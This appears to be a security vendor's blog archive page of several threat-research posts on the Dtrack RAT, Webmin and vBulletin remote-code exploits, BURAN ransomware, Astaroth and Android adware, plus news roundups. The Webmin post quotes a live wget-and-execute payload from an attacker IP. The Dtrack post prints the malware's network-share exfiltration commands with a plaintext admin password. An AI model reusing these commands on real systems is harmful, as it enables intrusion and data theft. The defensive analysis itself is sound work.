Dtrack RAT targeting a Nuclear Power Plant in India

/in /by

The SonicWall Capture Labs Threat Research Team have observed variants of the Dtrack Remote Access Trojan in the wild. Although reported as originating from North Korea, the latest variants of Dtrack are reported to be targeting Indian financial institutions and an Indian nuclear power plant. An earlier version of the malware called ATMDtrack was designed to steal data from ATMs in India.

Infection Cycle:

#File 1 – Sha256: 791c59a0d6456ac1d9976fe82dc6b13f3e5980c6cfa2fd9d58a3cc849755

We found that there are 2 encrypted sections in the overlay:

  1. Encrypted code
  2. Encrypted PE file

The  routines – sub_438F9C() and sub_438FE1() – have the same functionality to decrypt encrypted code which decrypts the encrypted PE file. The decrypted code works as loader for the PE which we get after file decryption.

The actor either patched all the __SEH_prolog4 and __SEH_epilog4 (Structured exception handling to handle the exceptions) or has done some manipulation in the compiler tool toolchain while linking.

The SEH Prolog and Epilog is referred by almost all static functions. The __SEH_prolog4 is replaced with FUN_00438f9c in below static functions

Original code of statically linked function _onexit():

Patched code:

Below function reads the offset and size from the DOS stub:

Stage 1 encrypted code’s information is kept in DOS stub, Offset = 90620 and size = D10.

Encrypted Code:

Algorithm used to decrypt the data is slightly modified version of RC4:

After decryption (stage 1 code):

This stage 1 code decrypts the encrypted PE file kept in overlay and acts as loader to load the file in memory and execute. The encrypted PE file’s information is kept in DOS stub. It uses same algorithm to decrypt the PE file (sha256: bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364).

 

#File 2 – SHA: bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364

Upon execution, the sample first collects following data from the victim’s system:

  • Computer name
  • RegisteredOwner
  • RegisteredOrganization
  • InstallDate
  • MAC Address
  • IP Address

It then creates following sub-folders and files:

  • %TEMP%\temp
  • %TEMP%\temp\<host IP address>
  • %TEMP%\temp\res.ip [Windows IP configuration information]
  • %TEMP%\temp\task.list [List of active processes]
  • %TEMP%\temp\netstat.res [Display list of TCP connections and the associated PID]
  • %TEMP%\temp\netsh.res [Interface configuration]

The malware copies below files into “%TEMP%\MSI17f1f.tmp”. The malware reads “%TEMP%\MSI17f1f.tmp” to retrieve browser history and saves it into “%TEMP%\temp\browser.his”:

  • \AppData\Roaming\Mozilla\Firefox\Profiles\1hoxsxkh.default\places.sqlite
  • \AppData\Local\Google\Chrome\User Data\Default\History

The malware tries to connect to below IP addresses:

  • 172.22.22.156
  • 10.2.114.1
  • 172.22.22.5
  • 10.2.4.1

If malware connects to any of the above IP address, it saves the information into “browser.his”:

The malware Iterates system directories and list all files into “c.tmp~”. Later it moves “c.tmp~” into password protected compressed file “c.tmp” with password “dkwero38oerA^t@#”:

The malware moves “%TEMP%\temp” directories into password protected compressed file “~7AD874E4MT.tmp” with password “abcd@123”. “7AD874E4” in compressed file name is the checksum of information (Computer name, RegisteredOwner, RegisteredOrganization, InstallDate and AdaptersInfo):

The malware executes below commands in Command Shell to upload the collected information to the network:

  • net use \\10.38.1.35\C$ su.controller5kk /user:KKNPP\administrator
  • move /y C:\Users\AppData\Local\Temp\\~7AD874E4MT.tmp \\10.38.1.35\C$\Windows\Temp\MpLogs\
  • net use \\10.38.1.35\C$ /delete

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Dtrack.A (Trojan)
  • GAV: Dtrack.NK (Trojan)
  • GAV: Dtrack.NK_2 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Hackers continue to mount attacks on Webmin servers

/in /by

Webmin servers have been under attack after (August) the major disclosure of remote code execution vulnerability. SonicWall Threat Research Lab continues to observe attempts to exploit this vulnerability in the Webmin server. 

Webmin:

With over 3 million downloads per year, Webmin is one of the world’s most popular open-source web-based applications for managing Unix-based systems. It allows management of a system remotely through a Web-GUI.  Webmin can be installed on any Apple Mac OS X server, FreeBSD, CentOS, Ubuntu Linux, Solaris platforms, although recent versions can also be installed and run on Windows. Once the product is installed, a web interface is available to administer and manage the system remotely. It helps to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify and control open-source apps, such as the Apache HTTP Server, PHP or MySQL.  It usually listens for connections on port 10000.

Vulnerability | CVE-2019-15107:

Change Passwords is a standard webmin module which allows the current user to change the password of any user on the system. A password can be changed via a HTTP POST request to password_change.cgi.

A command injection vulnerability exists in the Change Passwords module of Webmin. When password_change.cgi receives a POST request to change a user’s password, it extracts the old HTTP parameter to validate. If the password specified by old is incorrect, it builds an error string to return to the user. When building this error string, it evaluates the value assigned to old as a shell command using the qx Perl function. This results in any shell command assigned to old parameter indiscriminately being executed. This is because of the backdoor implanted in some versions of the installation package and source code. This is an artificial backdoor and a typical case for supply chain attacks.

Password mode is set to 0 by default (passwd_mode=0).

When the following authentication option under Webmin Configuration page is checked, passwd_mode changes to 2 (passwd_mode=2) allowing the users to set a new password using the old password. 

Vulnerability can be triggered only when passwd_mode is set to 2 on the vulnerable versions of Webmin.

Exploit:

A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target system. Successful exploitation of this vulnerability could result in arbitrary remote command execution on the target system as the root user.

A recent attempt to exploit this vulnerability is reported by Bad Packets.

In this attempt, old password is specified as below. When the exploit shell code gets executed, it downloads and runs the malicious payload on the target system.

cd /tmp;
wget http://185.112.249.188/son.sh -O webmin.exploit;
chmod 777 webmin.exploit;
./webmin.exploit webmin   

Fix:
All Webmin versions between 1.882 to 1.921 downloaded from Sourceforge are vulnerable.

According to a Shodan search, Webmin has more than 262,000 public instances available at the time of writing, mostly located in the United States, France, Germany, Canada & United Kingdom—of which only 90,000 instances are running the latest patched Webmin version 1.930.

Webmin administrators are advised to update to the version 1.930.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • IPS: 14367 Webmin password_change.cgi Remote Command Injection 1
  • IPS: 14368 Webmin password_change.cgi Remote Command Injection 2
  • WAF: 1726 Webmin Unauthenticated Remote Code Execution 

IOC:

SonicWall firewalls have blocked attempts from the following attacker IP addresses.

104.160.43.89
104.192.3.82
109.236.90.209
115.79.214.147
122.96.43.105
141.98.213.190
144.217.255.89
144.217.90.68
148.70.158.156
149.56.44.47
158.69.150.53
162.247.72.199
162.247.74.202
163.172.76.38
167.71.154.202
171.25.193.77
171.25.193.78
172.1.43.9
176.10.99.200
179.43.146.230
185.100.87.207
185.112.146.55
185.220.100.253
185.220.102.4
185.220.102.6
185.220.102.7
185.225.208.117
192.168.7.99
193.169.255.102
193.56.28.120
195.176.3.23
195.189.96.147
195.206.105.217
198.98.56.149
23.129.64.156
23.129.64.162
23.129.64.168
23.129.64.170
23.129.64.180
23.129.64.184
23.129.64.185
23.129.64.206
23.129.64.211
23.129.64.214
46.165.230.5
50.7.176.2
51.75.201.127
62.102.148.68
87.118.116.103
87.120.254.105
89.234.157.254
94.230.208.148
95.128.43.164
185.112.249.188
147.135.124.113

Cyber Security News & Trends – 10-25-19

/0 Comments/in /by

This week, SonicWall releases new threat intelligence data, one cybergang poses as a tougher cybergang, and jackpotting ATMs are spreading in the wild.

SonicWall Spotlight

SonicWall: Encrypted Attacks, IoT Malware Surge as Global Malware Volume Dips – SonicWall Blog

  • SonicWall releases new threat intelligence data from SonicWall Capture Labs revealing 7.2 billion malware attacks were launched in the first three quarters of 2019 as well as 151.9 million ransomware attacks, marking 15% and 5% year-over-year declines, respectively. Despite the drop in attacks overall, the figures also show a rise in encrypted and IoT attacks suggesting a larger attempt by cybercriminals to target specific individuals and companies rather than launching very broad attacks.

Spooky Cyber Threats – Ping: A Firewalls.com Podcast Episode 5 – Firewalls.com Podcast

  • SonicWall returns to the Ping podcast, this time Sales Engineer Daniel Kremers appears to discuss cyberthreats with the Firewalls.com team.

Cybersecurity Roundup: Splunk, SonicWall, Bugcrowd, Exabeam – Channel Futures

  • SonicWall CEO Bill Conner is quoted by Channel Futures, explaining the new threat intelligence data. The news is also covered in MSSPAlert and ComputerWeekly.

Cybersecurity News

Ransomware and Data Breaches Linked to Uptick in Fatal Heart Attacks – PBS

  • A disturbing new study has looked at the available data from hospitals that suffered from ransomware attacks and has found a correlation with deaths from heart attacks at the same institutions. The study has found that the time it took for a patient to receive an electrocardiogram increased by as much as 2.7 minutes after a data breach, and this lag remained as high as 2 minutes even after three to four years.

What Is Wrong With Cybersecurity and Why Is It Messing With My Operations? – Forbes Technology Council

  • In the latest Forbes Technology Council post, it is argued that cybersecurity should be seen as a form of warfare. To win the war constant movement, change and adaptation is needed in order to keep up with the cyber arms race.

The NCSC Annual Review 2019 – The National Cyber Security Centre (UK)

  • The NCSC Annual Review 2019 sheds a light on some of the work the GCHQ has done over the past year, revealing that it handled 658 cyber incidents in the last 12 months and provided support to almost 900 victims of cyberattacks. The report lists Russia, China, Iran and North Korea as hostile states actively targeting the UK with cyberattacks

A DDoS Gang Is Extorting Businesses Posing as Russian Government Hackers – ZDNet

  • A DDoS gang is trading on the Russian-government linked ransomware group Fancy Bear’s name by launching DDoS attacks and ransom demands, threatening further attacks if the ransom is not paid. The group is in reality not related to the Fancy Bear group.

‘Sensitive US Army Data ‘Exposed by Online Leak’ – BBC News

  • 179 GB of data was made accessible on an unsecured cloud server run by a travel services company Autoclerk. Data exposed includes full names, birth dates, addresses, phone numbers and travel itinerary details of a range of people, including US government and military personnel.

Avast Says Hackers Breached Internal Network Through Compromised VPN Profile – ZDNet

  • Avast has confirmed it suffered from a successful cyberattack after disclosing that a hacker attempted to insert malware into their CCleaner software. This is the second time CCleaner has suffered from supply-chain attack after hackers breached previous CCleaner owner, Piriform, in 2017.

And Finally:

Malware That Spits Cash out of ATMs Has Spread Across the World – Vice

  • “Jackpotting” malware attacks on ATM are spreading around the world with 10 incidents in Germany between February and November 2017 letting hackers to walk off with 1.4 million euro. Experts say that 2019 figures suggest that the attacks are only increasing.

In Case You Missed It

SonicWall: Encrypted Attacks, IoT Malware Surge as Global Malware Volume Dips

/3 Comments/in /by

New cyber threat intelligence from SonicWall shows that malware and ransomware attacks have dipped through the third quarter of 2019, but other attack types, including encrypted threats and IoT malware, are spiking in volume.

SonicWall, which blocks an average of 26 million malware attacks globally each day, recorded 7.2 billion malware attacks and 151.9 million ransomware attacks globally through the first three quarters of 2019, marking 15% and 5% year-over-year declines, respectively.

“Historically, the goal for most malware authors was quantity of infections and now we’re seeing attackers focus on fewer higher-value targets where they can spread laterally,” said SonicWall President and CEO Bill Conner in an official announcement. “This shift in tactics has also seen a corresponding rise in the ransom demands, as attackers attempt to make more money from fewer, but higher value, targets like local municipalities and hospitals.”

Encrypted attacks up 58%

Alarmingly, encrypted threats continue to show record volume compared to 2018. Malware attacks over HTTPs (e.g., TLS and SSL encryption standards) are up 58% year-over-year. Seasonal data — including attacks over holiday shopping seasons — indicate that this number will likely grow through the final quarter of 2019.

Source: SonicWall Capture Labs

Attacks over non-standard ports still a problem

As outlined in the mid-year update to the 2019 SonicWall Cyber Threat Report, malware authors continue to take advantage of unguarded attack vectors, particularly non-standard ports.

While an average of 14% of malware came across non-standard ports through the first three quarters of 2019, attacks across the vector have grown in both the second (20%) and third quarters (17%). SonicWall’s non-standard port data is based on a sample size of more than 275 million malware attacks recorded worldwide through September 2019.

“What the data shows is that cybercriminals are becoming more nuanced, more targeted and savvier in their attacks,” said Conner. “Businesses need to align to create stricter security rules within their organizations to reduce the threats that our researchers are identifying.”

IoT malware volume up again

The Internet of Things (IoT) grew out of an appetite of speed, convenience and hyper-connectivity. But as has been outlined before, this came often came at the expense of sound cybersecurity practices.

It was only a matter of time before cybercriminals exploited this decision of apathy.

In 2018, SonicWall Capture Labs recorded 32.7 million IoT malware attacks, a 215.7% year-over-year increase. During the first half of 2019, that number jumped another 55%. Now, through three quarters of 2019, IoT malware attacks have eclipsed 25 million, a 33% year-over-year increase.

2019 Cyber Threat Intelligence & Data from SonicWall

For more 2019 third-quarter cyber threat intelligence, please view the official announcement and explore the SonicWall Capture Security Center for interactive data across different attack vectors and geographical regions.

vBulletin Remote command execution vulnerability

/in /by

vBulletin is a proprietary Internet forum software. It is written in PHP and uses a MySQL database server. Once installed and configured, the forum is accessible via Hypertext Transfer Protocol (HTTP).

vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request ( CVE-2019-16759 )

A remote command execution vulnerability exists in vBulletin . An attacker can exploit this vulnerability by specially crafted httpPOST request. For exploiting authentication is not required therefore it is a pre-auth remote command injection. The commands would be executed with the same privileges as the vBulletin service. This could result in hackers taking over vulnerable web forums.

Examining the PoC code we understand that malicious parameters commands could be passed to widgetConfig[code] which will then get posted via the routestring POST request.

The POST request looks like this

Followed by the exploit code.

Some examples of exploits in the wild

after decoding :

another example:

after decoding :

In both examples attacker tries to execute web shell commands.

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • IPS 14453 vBulletin widgetConfig Remote Command Execution 1
  • IPS 3185 Web Application Remote Code Execution 14

IoCs:

  • 182.161.18.135
  • 191.37.220.126
  • 14.231.65.23
  • 129.0.76.131

Threat Graph:

Cyber Security News & Trends – 10-18-19

/0 Comments/in /by

This week, SonicWall wins at the Computing Security Awards, and the cyberattack that almost took down the 2018 Olympics.

SonicWall Spotlight

SonicWall Wins at the Computing Security Awards

SonicWall Investing in Direct Touch and Channel Skills – ComputingWeekly

  • SonicWall’s Terry Greer-King talks to Computer Weekly about the expansion of SonicWall University amongst SonicWall Partners, and how additional staffing in direct-touch model has increased growth in the EMEA market.

Nanocore Under the Microscope – Security Boulevard

  • Using work previously published by the SonicWall Threat Labs, Security Boulevard takes a deep dive into the inner workings of the Remote Access Trojan known as NanoCore RAT, currently undergoing a change in delivery methods.

Using EDR for Layered Security – Techradar Pro

  • With the requirement for a layered security approach increasingly becoming public knowledge, SonicWall’s Terry Greer-King argues that the rapidly growing market of Endpoint Detection and Response (EDR) is the best solution. He explains what it is, how it works and why cybersecurity systems need to be multi-faceted and layered to compete in the modern threat landscape.

Cybersecurity News

The Untold Story of the 2018 Olympics Cyberattack, the Most Deceptive Hack in History – Wired

  • Reviewing the 2018 Olympics opening ceremony in South Korea, USA Today wrote that “it’s possible no Olympic Games have ever had so many moving pieces all run on time.” Little did they know that behind the scenes an entire team of cybersecurity experts were fire-fighting a major cyberattack that was working to take the entire Olympics network down.

French TV Station Shrugs Off Ransomware Attack to Keep Running – CBR Online

  • One of France’s largest privately-owned media groups, M6, survived a ransomware attack without a disruption to radio or tv. They group praised the “quick and efficient intervention of our cybersecurity experts” for its ability to keep operating during the attack.

Major Airport Malware Attack Shines a Light on OT Security – Threat Post

  • A cryptomining infection that spread rapidly through an unnamed European airport has shined a spotlight on poor cybersecurity practices. Despite being part of a known strain of cryptomining software, the malware had been altered enough to raise no red flags with airport personnel and was active for months before being detected.

Cybersecurity & Data Privacy Trends in 2020 – ITProPortal

  • 5G, cybersecurity budgets, data privacy regulations, staffing problems, Internet of Things; ItProPortal looks to the future and argues that all of these disparate but related trends will converge in 2020.

Sodinokibi Ransomware: Where Attackers’ Money Goes – Dark Reading

  • Researchers investigate ransomware-as-a-service malware Sodinokibi in an attempt to understand how much money is involved. Factoring in how much money is involved, and who it goes to, they conclude that the operators are making a “fortune, ” as much as $86,000 pure profit from a single affiliate in one 72 hour period.
And Finally:

‘Sextortion Botnet Spreads 30,000 Emails an Hour’ – BBC

  • There is an ongoing large-scale “sextortion” campaign making use of more than 450,000 hijacked computers. Sending emails at 30,000 an hour they threaten to release compromising photographs of the recipient unless $800 is paid in Bitcoin. By using real data gleaned from data breaches the extortion attempt can seem legitimate but this is a fear-based campaign with the extortioners working from the“rule of big numbers.“

In Case You Missed It

BURAN Ransomware spreading through Javascript

/in /by

SonicWall RTDMI ™ engine has recently detected a highly obfuscated Javascript file which is delivering BURAN Ransmoware as payload. The malware is delivered to the victim’s computer as an archive containing JavaScript file as shown below:

This malicious script is obfuscated using Javascript obfuscator available on https://obfuscator.io. This script uses Compact Code, Rotate String Array, String Array encoding using RC4 obfuscations to name a few.


Fig-1: JavaScript file

After inserting the line breaks one can easily identify the Rotation of String Array and other obfuscation techniques as shown in below images.


Fig-2: String Rotation technique used in obfuscation

After string rotation on the array sdisdoihdofoiofidiafgobdoa, elements order is changed as shown below:

As shown above, after rotation the element at index 166 becomes the first element and the element at index 167 becomes the second and so on.

Elements of this array are de-obfuscated further by Base64 decoding and RC4 decryption.  Keys for RC4 decryption are present in the file.


Fig-3: Base 64 decoding

 


Fig-4: RC4 decryption

As shown below, the deobfuscated code downloads and executes the payload:

 

Payload Analysis:

At present, the payload being distributed belongs to the BURAN ransomware family.

Infection Cycle:
Malware creates a copy of itself as %appdata%\Microsoft\windows\lsass.exe and adds a Run entry for persistence as follows:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • “Local Security Authority Subsystem Service” = %appdata%\Microsoft\Windows\lsass.exe -start

Adds the following Registry key:

  • HKEY_CURRENT_USER\Software\Buran V
    • “Knock” = 0x0000029a

Post-infection malware shows the following ransom notes to the victim:

For an encrypted file, personal id shown in the ransom note is appended to the filename. For example, “notes.txt” file is renamed to “notes.txt.[2074D3D3-7546-6D74-A84E-9A1F4AEF44E6]” after encryption.

 

Network Connections:

Connects to the following domains:

    • http://geoiptool.com
    • http://iplogger.ru/1EMT77.jpg
      • User-Agent : BURAN

 

Indicators of Compromise:

  • 3b17292dd99059a56a3c06686d217c9ac9b75386501666f0a2141164edbbf2bf  [Archive sha256]
  • ed90f116281e1287fda0e181d768a75614983cd81418f9c6fdb6c1a2fa803489 [Javascript sha256]
  • ef2dfe3cb46bc5c7f9e0a935fbbccc100256cec4063a2e2945731cce540608a6 [Buran Ransomware]

 

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Additional Remark:

Please note that the RTDMI ™ engine analyzed and gave us a verdict for the samples as ‘Malicious’ on October 7, 2019 15:58 pm (GMT) as visible in the report:

Whereas the samples were first seen on Virustotal at later dates/times as evident by the ‘First Submission’ date:

Astaroth latest variant using Alternative Data Stream (ADS), Living Off The Land technique and YouTube for hosting content

/in /by

SonicWall RTDMI ™ engine has recently detected a LNK file inside an archive which delivers Astaroth Trojan to the victim’s machine. Archive file contains malicious LNK file has shown below:

 

LNK file contains an obfuscated command which uses EXPLORER.EXE to execute malicious JavaScript embedded in remote Uniform Resource Locator (URL):

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution:

 

JavaScript Analysis:

JavaScript contains 10 different URLs to download malicious files. It generates a random number to select a URL from the list. If the selected URL is not active, it will again generate a random number to select a URL in next iteration:

 

JavaScript creates a directory C:\Users\Public\Libraries\trust and downloads below files from the selected URL using Bitsadmin tool:

  • landoqeahjkya.jpg
  • landoqeahjkyb.jpg
  • landoqeahjkyc.jpg
  • landoqeahjkydwwn.gif
  • landoqeahjkydx.gif
  • landoqeahjkyg.gif
  • landoqeahjkygx.gif
  • landoqeahjkyi.gif
  • landoqeahjkyxa.~
  • landoqeahjkyxb.~
  • landoqeahjky64a.dll
  • landoqeahjky64b.dll

JavaScript immediately moves downloaded file into the Alternative Data Steam of desktop.ini, except landoqeahjky64a.dll and landoqeahjky64b.dll.

 

“Alternative Data Stream (ADS) is a feature of New Technology File System (NTFS) in Windows to store metadata for a specific file”

 

Alternative Data Streams of desktop.ini have been shown below using Streams tool:

 

JavaScript combines content from landoqeahjky64a.dll and landoqeahjky64b.dll to construct a valid Dynamic Link Library (DLL) and copies it to below files:

  • landoqeahjky64.dll
  • mozcrt19.dll
  • mozsqlite3.dll
  • sqlite3.dll

JavaScript writes “145_MULT1T3SL4S_” to r1.log file. It uses ExtExport.exe which is part of Windows Internet Explorer, to load one of the above DLL file. The loaded DLL belongs to Astaroth malware family:

 

Astaroth Analysis:

Astaroth is an information stealer which is primarily affecting Brazilian citizens since 2018. This malware prominently known for using Living Off The Land tactics to become invisible from security software.

 

Once landoqeahjky64.dll is loaded by ExtExport.exe, it combines content from landoqeahjkyxa.~  and landoqeahjkyxb.~ to construct a valid Dynamic Link Library (DLL). The malware uses process hollowing to load the constructed DLL in memory.

 

The malware looks for the default language of the system. If the default language is not Portuguese, the malware terminates immediately:

 

The malware reads and decrypts ADS content from desktop.ini:landoqeahjkygx.gif:

 

The malware uses above decryption logic for all the encrypted files. The same decryption logic was also used in previous version of Astaroth. We can decrypt Astaroth component files using the below code:

 

The malware searches below files in sequence to the victim’s system:

  • C:\Program Files\Diebold\Warsaw\unins000.exe
  • C:\Windows\SysWOW64\userinit.exe
  • C:\Windows\System32\userinit.exe

 

The malware finds C:\Windows\System32\userinit.exe and creates a new process to inject ADS content from desktop.ini:landoqeahjkygx.gif:

 

The malware reads and decrypts DLL file from ADS desktop.ini:landoqeahjkyg.gif, then uses process hollowing to load the decrypted DLL in memory:

 

The malware checks for below installed antivirus software on victim’s machine:

  • AVAST Software
  • AVG
  • Symantec
  • McAfee
  • COMODO
  • Bitdefender
  • ESET

The malware collects system information and saves it into the ADS desktop.ini:auid.log as shown below:

Network:

The malware uses YouTube to host the encrypted content as shown below:

 

Other Component:

The malware contains below well known files:

WebBrowserPassView by NirSoft: It is a password recovery tool that reveals the passwords stored by browsers.

Mail Password Recovery by Nirsoft: It is a password-recovery tool that reveals the passwords and other account details for email clients.

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

 

How to Protect Multi-Cloud Environments with a Virtual Firewall

/3 Comments/in /by

Virtualization technology is powering a momentous revolution in today’s modern data centers and clouds, leading to designs that are commonly a mix of private, public and hybrid cloud computing environments.

International Data Corporation (IDC) research predicts that more than 90% of organizations will have some portion of their applications or infrastructure running in the cloud by the end of 2024.

As multi-cloud migration happens and organizations embrace technologies, such as containers, network virtualization must expand to adequately secure highly dynamic environments ranging from public clouds to private clouds to data centers. Otherwise, organizations face the risks of visibility blind spots and control challenges.

To circumvent this, organizations are implementing cloud security solutions that operate together and are easily managed. The benefits of cloud computing are well-known and significant. However, so are the security challenges, exemplified by the many recent high-profile data breaches. Whether stored in a physical data center or in a public, private or hybrid cloud, your data is the hacker’s goal.

Securing the cloud introduces a range of challenges, including a lack of network traffic visibility, unpredictable security functionality and the struggle to keep pace with the rate of change commonly found in cloud computing environments. To be efficacious, organizations need a cloud security solution that:

  • Identifies and controls network traffic within the cloud based on identity, not the ports and protocols they may use.
  • Stops malware from gaining access to and moving laterally within the cloud.
  • Determines who should be allowed to use the applications, and grants access based on need and credentials.
  • Streamlines deployment and gets a new instance up and running with a click. You do not want to configure each virtual firewall, since that is time-consuming. Ideally, you have a pre-defined configuration pushed to the device and it is up and running.
  • Cost-effectively replaces expensive WAN connection technologies, such as MPLS, with secure SD-WAN.
  • Simplifies administration and minimizes the security policy delay as virtual machines (VM) are added, removed or moved within the cloud environment.

Securing the cloud with SonicWall NSv virtual firewalls

Recently, SonicWall announced a new firmware, SonicOS 6.5.4, on its virtual firewall platforms to provide feature parity with its hardware firewall platform.

SonicWall Network Security virtual (NSv) firewalls now support secure SD-WAN, Zero-Touch Deployment, DNS security, Restful API and many more features that help solve the aforementioned problems.

SonicWall NSv firewalls help security teams reduce different types of security risks and vulnerabilities, which can cause serious disruption to business-critical services and operations.

With full-featured security tools and services, including reassembly-free deep packet inspection (RFDPI), security controls and networking services equivalent to what a SonicWall physical firewall provides, NSv effectively shields all critical components of your private/public cloud environments.

NSv is easily deployed and provisioned in a multi-tenant virtual environment, typically between virtual networks (VN). This allows it to capture communications and data exchanges between VMs for automated breach prevention, while establishing stringent access control measures for data confidentiality and VM safety and integrity.

Security threats (such as cross-virtual-machine or side-channel attacks and common network-based intrusions and application and protocol vulnerabilities) are neutralized successfully through SonicWall’s comprehensive suite of security services.

All VM traffic is subjected to multiple threat analysis engines, including intrusion prevention, gateway anti-virus and anti-spyware, cloud anti-virus, botnet filtering, application control and the Capture Advanced Threat Protection (ATP) multi-engine sandbox.

Aggressive Android adware communicates with a number of malicious domains

/in /by

SonicWall Capture Labs Threats Research Team came across an adware that showed high network communication during its execution. This is typical behavior of an adware but this adware communicated with a number of malicious domains which peaked our interest.

Infection Cycle

Among the permissions needed by this adware, few high-risk permissions are listed below:
  • Read settings
  • Write settings
  • Write external storage
  • Read sms
  • Send sms
  • Receive sms
  • System alert window
  • Receive boot completed

Soon after starting the adware app we began seeing ads that covered parts of the screen. We saw these advertisements at different times during our analysis. The advertisements were for casual games most of the times (more on this later in the blog).

Network Communications

We saw a spike in network traffic once we started the app, a network capture revealed a multitude of domains that were contacted in quick successions. A number of these domains have been flagged as malicious on VirusTotal as few of these domains have connections with or are hosting malicious applications.

Below are few domains that were contacted and VirusTotal highlights about them:

45.33.125.188

139.162.141.85

cdn.jsdelivr.net

ps.okyesmobi.com:8802

In one instance we saw the IMEI of our device was transmitted to one of the connected domains:

 

Some of the domains that were contacted host a number of malicious apk files, below are VirusTotal graphs for a few:

 

 

Spike in Network consumption

During our analysis we measured the network consumption from the infected device. Unsurprisingly, we saw high network consumption from the adware and apps installed by the adware as shown below:

This can be extremely annoying especially for folks with limited data capacity mobile plans.

Installed apps and shortcuts

We observed a few shortcuts on the homescreen for different apps shown by the adware:

Later, we saw few apps installed on the device without our knowledge:

Gaming for ad profit

During our analysis we saw a lot of game related ads on the screen. We decided to try a few of them out. When playing these games we observed something simple yet clever:
  • The games are of the ‘endless runner’ category where the player accumulates points the more time he is alive
  • Whenever the player loses, an advertisement is played

In short, the hosting company profits whenever the player loses. So how do they maximize their profits ? By making the games harder!

Compared to casual games like these, we observed the level of difficulty to be a bit steep in comparison. As a result we ended up losing more frequently which resulted in ads getting displayed each time we lost.

Overall this contributed towards an increase in network consumption and advertisement related profit for the uploaders.

 

Rooting mechanisms

The adware constantly requested superuser permissions once we started it:

One of the files present in the adware’s installed folder is a script file that contains code to root the device:

Closing thoughts

Overall this adware does a lot of activities after infecting a device. It displays advertisements, installs rogue apps, communicates with malicious domains and overall increases the network consumption of the device. We saw few instances where sensitive information from the device was leaked, but the fact that it communicates with domains with malicious content hosted on them is worrying.

 

Sonicwall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.Adware.LO

Indicators Of Compromise (IOC’s):

  • f1c7ff832393feac50d2ed3dc80ba3b8